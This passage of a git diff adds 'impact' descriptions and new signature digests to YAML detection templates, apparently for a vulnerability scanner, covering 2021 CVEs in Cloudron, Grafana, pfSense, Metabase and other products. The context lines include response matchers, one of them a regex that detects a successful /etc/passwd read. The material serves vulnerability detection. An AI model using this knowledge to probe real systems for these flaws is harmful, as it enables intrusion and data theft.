+# digest: 4a0a00473045022100e63d5df554a80e901c03222e5725cd8b7506690691af1b99aa6825e6de5ba96d02201bdd6453fc9a7fcd807a33caff8409cf9d24ac44575c8ecbc082aa6970b212a6:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-40868.yaml b/http/cves/2021/CVE-2021-40868.yaml
index 4872139775..2fed6068f2 100644
--- a/http/cves/2021/CVE-2021-40868.yaml
+++ b/http/cves/2021/CVE-2021-40868.yaml
@@ -5,6 +5,8 @@ info:
   author: daffainfo
   severity: medium
   description: In Cloudron 6.2, the returnTo parameter on the login page is vulnerable to cross-site scripting.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential data theft or unauthorized actions.
   remediation: Upgrade to Cloudron 6.3 or higher.
   reference:
     - https://packetstormsecurity.com/files/164255/Cloudron-6.2-Cross-Site-Scripting.html
@@ -45,4 +47,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 490a0046304402201bfa7c11b9889e03ed1158954422c06a6599930b485c36dfadcfc3116957bc2f02204c725751f97a5b31e4a1448a7c9c5c4c092bb9a4ce3801d3a7e4988726bea35a:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100c52d83a6cee178e3cae6c404dc140bd4e1bf62e4e15057e48522559bbce9c37c02203734fef48982bdff6478849323def36a475a5a0f9cbdbb0a2756014cab3c6dc1:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-40870.yaml b/http/cves/2021/CVE-2021-40870.yaml
index 5330bdcce6..0edc81c8d7 100644
--- a/http/cves/2021/CVE-2021-40870.yaml
+++ b/http/cves/2021/CVE-2021-40870.yaml
@@ -5,6 +5,8 @@ info:
   author: pikpikcu
   severity: critical
   description: Aviatrix Controller 6.x before 6.5-1804.1922 contains a vulnerability that allows unrestricted upload of a file with a dangerous type, which allows an unauthenticated user to execute arbitrary code via directory traversal.
+  impact: |
+    Successful exploitation of this vulnerability allows remote attackers to execute arbitrary commands on the affected system.
   remediation: |
     Upgrade Aviatrix Controller to version 6.5-1804.1922 or later to mitigate this vulnerability.
   reference:
@@ -48,4 +50,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4b0a0048304602210092781f9e65a3117caaeea163833b3d854ada0269988f3e95603b4026cba2132e022100ded3b82a6f1355a4c567d79f9941fa8eca51666b0be518a763d873b4db39ae8c:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100f77030ec106ccc70dfe2f980c848ee986bc255d48fc08701f797b58aec6e5df002207dae1e280a953d80cc22de90eeb36d6361cc13ed107ac4ad1e24ceda64f2017a:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-40875.yaml b/http/cves/2021/CVE-2021-40875.yaml
index 67347fdf35..6e9a918be3 100644
--- a/http/cves/2021/CVE-2021-40875.yaml
+++ b/http/cves/2021/CVE-2021-40875.yaml
@@ -5,6 +5,8 @@ info:
   author: oscarintherocks
   severity: high
   description: Improper access control in Gurock TestRail versions < 7.2.0.3014 resulted in sensitive information exposure. A threat actor can access the /files.md5 file on the client side of a Gurock TestRail application, disclosing a full list of application files and the corresponding file paths which can then be tested, and in some cases result in the disclosure of hardcoded credentials, API keys, or other sensitive data.
+  impact: |
+    An attacker could use the exposed files.md5 to gain insight into the application's file structure and potentially identify vulnerabilities or sensitive information.
   remediation: |
     Securely restrict access to the files.md5 file and ensure that it is not accessible to unauthorized users.
   reference:
@@ -47,4 +49,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a00473045022100a37c2573d20319441246d1731d87438095388a5081c0d81782c7cb254996baee02207d62fd0a15a0d4884e2ec73e81f088d0bd45be9b6441d0a384349a5ab0451e4c:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100b8865a399199fbde58115e62bf61304dbda63d1e502a5e0d899994d4f3365db5022003cd8d57d0597f4e256b9a9d19d9d24cbd04f7a2c56551948992465e4c052267:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-40908.yaml b/http/cves/2021/CVE-2021-40908.yaml
index dfec2264cb..31274b8976 100644
--- a/http/cves/2021/CVE-2021-40908.yaml
+++ b/http/cves/2021/CVE-2021-40908.yaml
@@ -6,6 +6,8 @@ info:
   severity: critical
   description: |
     SQL injection vulnerability in Login.php in Sourcecodester Purchase Order Management System v1 by oretnom23, allows attackers to execute arbitrary SQL commands via the username parameter.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation.
   remediation: |
     Apply the latest patches or updates provided by the vendor to fix the SQL Injection vulnerability in the Purchase Order Management v1.0 application.
   reference:
@@ -44,4 +46,4 @@ http:
           - 'contains(header, "text/html")'
           - 'contains(body, "status\":\"incorrect\"")'
         condition: and
-# digest: 4a0a004730450220277e5dd4e012207e1f87e9d42ea0dc881cde268e8fd4d8fe80c06dc5ae2e6e5f022100b1c4bb8102a42d4edf701ec3d6f9c9e155be9d582f3bd5d2b5b80060be79ee01:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022003d8082fe77d067e726403f7306ef238ef7fa6c821ce9fbfc212a9741b40a7da02210091f98675c3bff680f02135aab872b786aa4b81c214a2ee1a0dc061c3d6455f6e:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-40960.yaml b/http/cves/2021/CVE-2021-40960.yaml
index 103a963bc5..96144a21da 100644
--- a/http/cves/2021/CVE-2021-40960.yaml
+++ b/http/cves/2021/CVE-2021-40960.yaml
@@ -5,6 +5,8 @@ info:
   author: daffainfo
   severity: critical
   description: Galera WebTemplate 1.0 is affected by a directory traversal vulnerability that could reveal information from /etc/passwd and /etc/shadow.
+  impact: |
+    An attacker can read, modify, or delete sensitive files on the server, potentially leading to unauthorized access, data leakage, or system compromise.
   remediation: |
     Apply the latest security patches or updates provided by the vendor to fix the directory traversal vulnerability in Galera WebTemplate 1.0.
   reference:
@@ -39,4 +41,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a00473045022100b06c85b58ee3b1dfda8f6196db6aaa3dfe0ede0cc64e9d6c745323540e54331002204c72b46064c12b2e18fb9937a84943e2c73b51a661af6d24dfc364ffb2802b7d:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a004730450220537fa1daba29673a9ec850ef418c16c09f87dfcc539189a0df0d3df93576bc44022100f14a74032ed17dde2192e5fa28571488bbe177492819fa4bc80a2721f7e756da:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-40968.yaml b/http/cves/2021/CVE-2021-40968.yaml
index eaec30ebe6..2e6825af10 100644
--- a/http/cves/2021/CVE-2021-40968.yaml
+++ b/http/cves/2021/CVE-2021-40968.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     Cross-site scripting (XSS) vulnerability in templates/installer/step-004.inc.php in spotweb 1.5.1 and below allow remote attackers to inject arbitrary web script or HTML via the newpassword2 parameter.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential data theft or unauthorized actions.
   remediation: Fixed in version 1.5.2
   reference:
     - https://github.com/spotweb/spotweb/
@@ -54,4 +56,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 490a0046304402202e6edba961f9400ab6583f95bd071bddeaa4b77366b26643a7b6f53f7a1d1ecb02201ccb9ac6b497a3016a20a14dd4ec58cb0cedd4383b15acd6c93d0d232e8d70a8:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a0047304502206aca60bd3c2fbcd2dde884d6ff8d7bee14bad1897ade0680046c456cd6335b93022100805bd130da381013a4bb1b78bc2292570bdfacc98c27e4f22ee379013a4d146f:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-40969.yaml b/http/cves/2021/CVE-2021-40969.yaml
index c94c66a6d1..2b78aaa2f1 100644
--- a/http/cves/2021/CVE-2021-40969.yaml
+++ b/http/cves/2021/CVE-2021-40969.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     Cross-site scripting (XSS) vulnerability in templates/installer/step-004.inc.php in spotweb 1.5.1 and below allow remote attackers to inject arbitrary web script or HTML via the firstname parameter.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the victim's browser, potentially leading to session hijacking, data theft, or other attacks.
   remediation: Fixed in version 1.5.2
   reference:
     - https://github.com/spotweb/spotweb/
@@ -54,4 +56,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 490a0046304402201ae7205d958f2a8e2b29120719b7364fab26f7b309ce0ebc10aa164eb024d7ce022044e428cab1ff41b4ad6f9f1756a9e82dcb9a6a87324e3532c2619bbf5e5bb52a:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022044214ae73db0acfd3293ba70d60ee1e9c4f2b1ec734322f4a79283bd3bbdd1990221009b3cf17c67336dbe1f022ea694be631970ba1ec59f0dfea359274340f8a19ef4:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-40970.yaml b/http/cves/2021/CVE-2021-40970.yaml
index cdc3b00ca4..b5a48a7043 100644
--- a/http/cves/2021/CVE-2021-40970.yaml
+++ b/http/cves/2021/CVE-2021-40970.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     Cross-site scripting (XSS) vulnerability in templates/installer/step-004.inc.php in spotweb 1.5.1 and below allow remote attackers to inject arbitrary web script or HTML via the username parameter.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential data theft or unauthorized actions.
   remediation: Fixed in version 1.5.2
   reference:
     - https://github.com/spotweb/spotweb/
@@ -54,4 +56,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4b0a004830460221008159a366cacb78ba87fcda2b6673447a8df79d2a417def021f55d00d6bfc4926022100cfaa5ce87339e266e25e23e32cd72791fcccdb1b8c0aa3532a3948c16f0803cc:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100e267777f765580fc084fd3983ba72a03edf21298f63111c55f018013945ddb43022100954fe1d2eaa255a0b003035f90bbd0b059f319e20a8803eedf7da43e1ba01ed6:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-40971.yaml b/http/cves/2021/CVE-2021-40971.yaml
index 6ce0736d3f..76c2a8837b 100644
--- a/http/cves/2021/CVE-2021-40971.yaml
+++ b/http/cves/2021/CVE-2021-40971.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     Cross-site scripting (XSS) vulnerability in templates/installer/step-004.inc.php in spotweb 1.5.1 and below allow remote attackers to inject arbitrary web script or HTML via the newpassword1 parameter.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement.
   remediation: Fixed in version 1.5.2
   reference:
     - https://github.com/spotweb/spotweb/
@@ -54,4 +56,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4b0a00483046022100c571c52e0fb869ae95c4eb732c8de1b38af73c47bf718ce3adeca1654b4eb243022100eb5ed8a593d95142a00650a14c024b6b2ee9bf254575d5a95a9884ab344e902d:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100a14bc9c25076fbc885484e8b1ba96f298efd88070500aa91828efc072e364fc8022067fd669c70acb1a62b6bf1a1d3be6a9bb602b8422da6093257af4b408e393246:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-40972.yaml b/http/cves/2021/CVE-2021-40972.yaml
index 8f5fd9a18d..366f9e54c5 100644
--- a/http/cves/2021/CVE-2021-40972.yaml
+++ b/http/cves/2021/CVE-2021-40972.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     Cross-site scripting (XSS) vulnerability in templates/installer/step-004.inc.php in spotweb 1.5.1 and below allow remote attackers to inject arbitrary web script or HTML via the mail parameter.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement.
   remediation: Fixed in version 1.5.2
   reference:
     - https://github.com/spotweb/spotweb/
@@ -54,4 +56,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4b0a004830460221009d3e39a16ff5a49d42e6cd3ff9bb2ee9e1521088f9f7f8ed29cd3fce912aca590221008309106d3432190d48193bb9448f1e2fb291e5d835f4cfa1d0863d2deb7f81c4:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a0047304502200d0b171044c0f6eae81dfd1e97ee36ecbf36c8dfde420ef99c7bc1f138981265022100a9c6862ae64e1f56e0fc651ed08946ad68e73f4920d2fc39ecfe09480ac686be:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-40973.yaml b/http/cves/2021/CVE-2021-40973.yaml
index 0ecbe59fa0..d911bd5ec8 100644
--- a/http/cves/2021/CVE-2021-40973.yaml
+++ b/http/cves/2021/CVE-2021-40973.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     Cross-site scripting (XSS) vulnerability in templates/installer/step-004.inc.php in spotweb 1.5.1 and below allow remote attackers to inject arbitrary web script or HTML via the lastname parameter.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website.
   remediation: Fixed in version 1.5.2
   reference:
     - https://github.com/spotweb/spotweb/
@@ -54,4 +56,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4b0a00483046022100c399ff44e7b979254d61d82b32351b62000f663fb0cde3d7479d506ae0a82335022100d8d8d2925f450c35dc2315bac8960df15bd9a724762f017498776252054b4385:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100b7759ef0e1959f865b4005ab1f3f2507bdfd8f27a4ce34b81c70b73ad054b232022100a39d9f959567e791fe866256d9e7abea62086ba7eee25168851e09449ae3f913:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-40978.yaml b/http/cves/2021/CVE-2021-40978.yaml
index 0315ce8515..a98b9a6c66 100644
--- a/http/cves/2021/CVE-2021-40978.yaml
+++ b/http/cves/2021/CVE-2021-40978.yaml
@@ -5,6 +5,8 @@ info:
   author: pikpikcu
   severity: high
   description: The MKdocs 1.2.2 built-in dev-server allows directory traversal using the port 8000, enabling remote exploitation to obtain sensitive information. Note the vendor has disputed the vulnerability (see references) because the dev server must be used in an unsafe way (namely public) to have this vulnerability exploited.
+  impact: |
+    An attacker can read or modify sensitive files on the server, potentially leading to unauthorized access, data leakage, or system compromise.
   remediation: |
     Upgrade MKdocs to version 1.2.3 or later to fix the directory traversal vulnerability.
   reference:
@@ -42,4 +44,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a00473045022066ecf3b044c870ea159eb005e50b021598a8f2738f326828d6fa3a1e107439c8022100c796f7eb323658ff93de5741a751df928b455e5b6129c13883319bcf4a22a31a:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100f744e2ee1ddd4522e27c5f13e1aa9ae73c1996cde4ccdc2961738b0f6585d6210220075a32662f6e7859d4ef5b7bdecc993ef6aa1296a37b6538ea489a41c754cd94:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-41174.yaml b/http/cves/2021/CVE-2021-41174.yaml
index d2e57b5d40..47c25a1bb1 100644
--- a/http/cves/2021/CVE-2021-41174.yaml
+++ b/http/cves/2021/CVE-2021-41174.yaml
@@ -5,6 +5,8 @@ info:
   author: pdteam
   severity: medium
   description: Grafana is an open-source platform for monitoring and observability. In affected versions if an attacker is able to convince a victim to visit a URL referencing a vulnerable page, arbitrary JavaScript content may be executed within the context of the victim's browser. The user visiting the malicious link must be unauthenticated and the link must be for a page that contains the login button in the menu bar. The url has to be crafted to exploit AngularJS rendering and contain the interpolation binding for AngularJS expressions.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential data theft, session hijacking, or defacement of the Grafana application.
   remediation: Upgrade to 8.2.3 or higher.
   reference:
     - https://github.com/grafana/grafana/security/advisories/GHSA-3j9m-hcv9-rpj8
@@ -55,4 +57,4 @@ http:
         group: 1
         regex:
           - '"subTitle":"Grafana ([a-z0-9.]+)'
-# digest: 4a0a0047304502203ba285050bc933096e27461aa42c6f5b76f6aaeff1f7f4fc315103614860c0aa022100903d5e4196a0634ab5c880d500548df19f73bc296fb13183527024027ffec6bb:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022001f49261fe17bc2cb5d608ef4e1485a510f0c31fc574bc3cdf7ac4210cec99df0221008ece605cc34ec9743e010b6d3218bbcb1b59e1d061b6898688da51dacf56ae5e:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-41192.yaml b/http/cves/2021/CVE-2021-41192.yaml
index 4291d9736c..d35994affc 100644
--- a/http/cves/2021/CVE-2021-41192.yaml
+++ b/http/cves/2021/CVE-2021-41192.yaml
@@ -5,6 +5,8 @@ info:
   author: bananabr
   severity: medium
   description: Redash Setup Configuration is vulnerable to default secrets disclosure (Insecure Default Initialization of Resource). If an admin sets up Redash versions <=10.0 and prior without explicitly specifying the `REDASH_COOKIE_SECRET` or `REDASH_SECRET_KEY` environment variables, a default value is used for both that is the same across all installations. In such cases, the instance is vulnerable to attackers being able to forge sessions using the known default value.
+  impact: |
+    An attacker can gain unauthorized access to sensitive information and potentially compromise the Redash application.
   remediation: |
     Remove or update the default secrets in the Redash setup configuration file.
   reference:
@@ -47,4 +49,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a004730450220598984f433315880988af6908fcab9fac83b633ec3b6ecb631aa437d3c2a0618022100cc33c3da9739290b2a172962c6b6799be1fb531c61f5a33f32ccab411ddab5a0:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a00463044022025dba452dc6355bcd1fc79ba5f5f7ffeb8361451f9397b9a0c7ec5b3ef0fbfff02204e83762dea97daca6f469657010dfc331f373341f45ee4d43a4a0c2fa3b4726b:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-41266.yaml b/http/cves/2021/CVE-2021-41266.yaml
index 313ba9424b..adaa1bf273 100644
--- a/http/cves/2021/CVE-2021-41266.yaml
+++ b/http/cves/2021/CVE-2021-41266.yaml
@@ -6,6 +6,8 @@ info:
   severity: critical
   description: |
     MinIO Console is a graphical user interface for the for MinIO Operator. MinIO itself is a multi-cloud object storage project. Affected versions are subject to an authentication bypass issue in the Operator Console when an external IDP is enabled.
+  impact: |
+    An attacker can bypass authentication and gain unauthorized access to the MinIO Operator Console.
   remediation: 'Update to v.0.12.3 or higher. Users unable to upgrade should add automountServiceAccountToken: false to the operator-console deployment in Kubernetes so no service account token will get mounted inside the pod, then disable the external identity provider authentication by unset the CONSOLE_IDP_URL, CONSOLE_IDP_CLIENT_ID, CONSOLE_IDP_SECRET and CONSOLE_IDP_CALLBACK environment variable and instead use the Kubernetes service account token.'
   reference:
     - https://nvd.nist.gov/vuln/detail/CVE-2021-41266
@@ -52,4 +54,4 @@ http:
           - 201
           - 200
         condition: or
-# digest: 4a0a004730450220721a0c67a1c3166c2f36046287e8fedd731a3fb9487721d873af7fdbe0b13411022100b68855481ddd8da2af0ceb46416bd30678283dfdab122bacaa1991d56b6e03c6:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a0046304402207d81ad6441d5ee5d85c21a1983a3025ee22f308e8e4b6f3ce755eb9fa7ac4697022020adb92127339910c352d1d5dd76e2f509ec045b073282da96b15dd91d183737:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-41277.yaml b/http/cves/2021/CVE-2021-41277.yaml
index a1ea02a030..071f741daa 100644
--- a/http/cves/2021/CVE-2021-41277.yaml
+++ b/http/cves/2021/CVE-2021-41277.yaml
@@ -5,6 +5,8 @@ info:
   author: 0x_Akoko
   severity: high
   description: Metabase is an open source data analytics platform. In affected versions a local file inclusion security issue has been discovered with the custom GeoJSON map (`admin->settings->maps->custom maps->add a map`) support and potential local file inclusion (including environment variables). URLs were not validated prior to being loaded.
+  impact: |
+    The vulnerability can result in unauthorized access to sensitive files or execution of arbitrary code on the affected system.
   remediation: This issue is fixed in 0.40.5 and .40.5 and higher. If you are unable to upgrade immediately, you can mitigate this by including rules in your reverse proxy or load balancer or WAF to provide a validation filter before the application.
   reference:
     - https://github.com/metabase/metabase/security/advisories/GHSA-w73v-6p7p-fpfr
@@ -41,4 +43,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a00473045022100c24ce6c040f6d55954326af678f0f1db22515a793bb426ad3143d455d597a0fe02206b326f825f14fe0a7a6f93b9e7cd4c1c3a09b801eb51147f1a9c442ab64626fe:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100d58fae6e099f758db3e10bf0e0e29a8df1b8f648465a106080840128328b98f102202b6221519f92eeaf5a4a0ded06e79b3e3b1e6ec5e48d61969d6d30f9458b2ade:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-41282.yaml b/http/cves/2021/CVE-2021-41282.yaml
index 6f9d56722e..f10e0af819 100644
--- a/http/cves/2021/CVE-2021-41282.yaml
+++ b/http/cves/2021/CVE-2021-41282.yaml
@@ -6,6 +6,8 @@ info:
   severity: high
   description: |
     diag_routes.php in pfSense 2.5.2 allows sed data injection. Authenticated users are intended to be able to view data about the routes set in the firewall. The data is retrieved by executing the netstat utility, and then its output is parsed via the sed utility. Although the common protection mechanisms against command injection (e.g., the usage of the escapeshellarg function for the arguments) are used, it is still possible to inject sed-specific code and write an arbitrary file in an arbitrary location.
+  impact: |
+    Successful exploitation of this vulnerability can lead to unauthorized modification of critical system files, potentially resulting in a complete compromise of the pfSense firewall.
   remediation: |
     Upgrade to pfSense CE software version 2.6.0 or later, or pfSense Plus software version 22.01 or later.
   reference:
@@ -61,4 +63,4 @@ http:
           - '(sid:[a-z0-9,;:]+)'
         internal: true
         part: body
-# digest: 4a0a00473045022100bc4307c6add0cb6b88513f51adc0d01602b9b746bc76a15235cc1be1d34a963d02203720b8f9ffa5f16f8e15a625fc4f5ea3fa5ce86f3817f2625107be4fc45ab718:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100c4cefffb2a27611307a8683716217e7ddfca396e559d033cf74021070990b48b022100d48bfb93efcf01e746b05959b3a29876c3feea6b1cfdbb19d970ca74fe315d29:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-41291.yaml b/http/cves/2021/CVE-2021-41291.yaml
index b0195ca2d8..f0cde69d4a 100644
--- a/http/cves/2021/CVE-2021-41291.yaml
+++ b/http/cves/2021/CVE-2021-41291.yaml
@@ -5,6 +5,8 @@ info:
   author: gy741
   severity: high
   description: The ECOA BAS controller suffers from a directory traversal content disclosure vulnerability. Using the GET parameter cpath in File Manager (fmangersub), attackers can disclose directory content on the affected device
+  impact: |
+    An attacker can exploit this vulnerability to access sensitive files and directories, potentially exposing sensitive information.
   remediation: |
     Apply the latest security patches or updates provided by the vendor to fix the directory traversal vulnerability in the ECOA Building Automation System.
   reference:
@@ -36,4 +38,4 @@ http:
       - type: regex
         regex:
           - "root:.*:0:0:"
-# digest: 4a0a0047304502207a58c3d490ed72da6fa7d98229eb38811f977978f0653f586ad5cf12eabbd375022100ed1e5f9a54113ecb8a9b4cb942e5fa545f05a7be6bd6e2fd943abca460e9dad2:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a00463044022004e3ef6d9e643122d0261d750ad66e573b3d3d64d81ae26f788be75482bc0d7102204cb44558b56d77c8b23bac2f20b5c58852ced767f0e54ae70078ef96163a493d:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-41349.yaml b/http/cves/2021/CVE-2021-41349.yaml
index 1fb701f2f2..3348803119 100644
--- a/http/cves/2021/CVE-2021-41349.yaml
+++ b/http/cves/2021/CVE-2021-41349.yaml
@@ -5,6 +5,8 @@ info:
   author: rootxharsh,iamnoooob
   severity: medium
   description: Microsoft Exchange Server is vulnerable to a spoofing vulnerability. Be aware this CVE ID is unique from CVE-2021-42305.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the targeted user's browser, potentially leading to session hijacking, data theft, or other malicious activities.
   remediation: |
     Apply the latest security updates provided by Microsoft to mitigate this vulnerability.
   reference:
@@ -56,4 +58,4 @@ http:
       - type: status
         status:
           - 500
-# digest: 4a0a00473045022028462257bdd7dd6459d4c3ab3193ec732d44bf817c9decae4e06a86660b9de20022100da05856ef646bcbd2daf65290ba5ed09edce5e51692cfc7305084ddc4bda06ce:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a004630440220621aeeffb1e2df7e11d12eb453c955e1c12d9c85dbb2c9d3d773da7e72052e72022016bc1525571484c7a195f3844f8cf9043cdb38efea852a82e942805efea88819:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-41381.yaml b/http/cves/2021/CVE-2021-41381.yaml
index 7573b39197..938c6510ae 100644
--- a/http/cves/2021/CVE-2021-41381.yaml
+++ b/http/cves/2021/CVE-2021-41381.yaml
@@ -5,6 +5,8 @@ info:
   author: pikpikcu
   severity: high
   description: Payara Micro Community 5.2021.6 and below contains a directory traversal vulnerability.
+  impact: |
+    An attacker can access sensitive files on the server, potentially leading to unauthorized disclosure of sensitive information.
   remediation: |
     Upgrade to a patched version of Payara Micro Community or apply the necessary security patches to mitigate the directory traversal vulnerability.
   reference:
@@ -39,4 +41,4 @@ http:
           - "payara.security.openid.default.providerURI="
           - "payara.security.openid.sessionScopedConfiguration=true"
         condition: and
-# digest: 490a00463044022003826b40c9ba768d4937a4ae75be19efbb1226fa959f9b1e82d65df3f668f7a40220276d9cf201159c6071bed5363c54a47746ccd88a982e8505a8ce78475aed059f:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a00463044022002f7bccc93088eb475740ab01423b1c88fe734b7365f6c83c3401b197d8daadd02205aa816caf11f12239b315bd78dc27afa05498d5081a96ecaaa65a9f94cc77e77:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-41432.yaml b/http/cves/2021/CVE-2021-41432.yaml
index 11a31b886d..0c6e52fb9d 100644
--- a/http/cves/2021/CVE-2021-41432.yaml
+++ b/http/cves/2021/CVE-2021-41432.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     FlatPress 1.2.1 contains a stored cross-site scripting vulnerability that allows for arbitrary execution of JavaScript commands through blog content. An attacker can possibly steal cookie-based authentication credentials and launch other attacks.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into the application, leading to potential data theft, session hijacking, or defacement of the website.
   remediation: |
     Upgrade to the latest version of FlatPress (1.2.2) or apply the provided patch to fix the XSS vulnerability.
   reference:
@@ -77,4 +79,4 @@ http:
           - name="_wpnonce" value="([0-9a-z]+)" />
         internal: true
         part: body
-# digest: 4a0a004730450221008dcf06e1fb8999662efa89a6d2a425cc0389972563dac90b800b7e40b6afb41a022005bc85f9b022caa232b781a5d5306f7699d664260b338afca7baf21a1a8105d6:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100fcc3721d3be12b68655fdfdd8d59566bceffb17eeed9c16876e5b97e01bf9c61022075efad622c3089cb3a0954bd490d706ce2305ef8c02311fcf7bed7b23a27b5e2:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-41460.yaml b/http/cves/2021/CVE-2021-41460.yaml
index 66e4374693..9bd6329978 100644
--- a/http/cves/2021/CVE-2021-41460.yaml
+++ b/http/cves/2021/CVE-2021-41460.yaml
@@ -6,6 +6,8 @@ info:
   severity: high
   description: |
     ECShop 4.1.0 has SQL injection vulnerability, which can be exploited by attackers to obtain sensitive information.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data manipulation, or data leakage.
   remediation: |
     Apply the latest patch or upgrade to a newer version of ECShop to mitigate the SQL Injection vulnerability (CVE-2021-41460).
   reference:
@@ -48,4 +50,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a004730450221008299a57895c2dfe08942a41fe0a4db98674ffacbda1bc21b5d569a786a2e06460220595648596b9e923c8553c9e8ae736f5a410ac3c65c2da1b1d51b5122b0dedd2f:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100a8bd28e5e4dc621ea2925d18bf05e485c368e97ebe9acd8202ea00f69cadc7b902210082f66d6a18dc98baba79dc611f412cf4c9c7f80ac229ddf99a55caac7d115c60:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-41467.yaml b/http/cves/2021/CVE-2021-41467.yaml
index a65fafce76..21aa2a3f99 100644
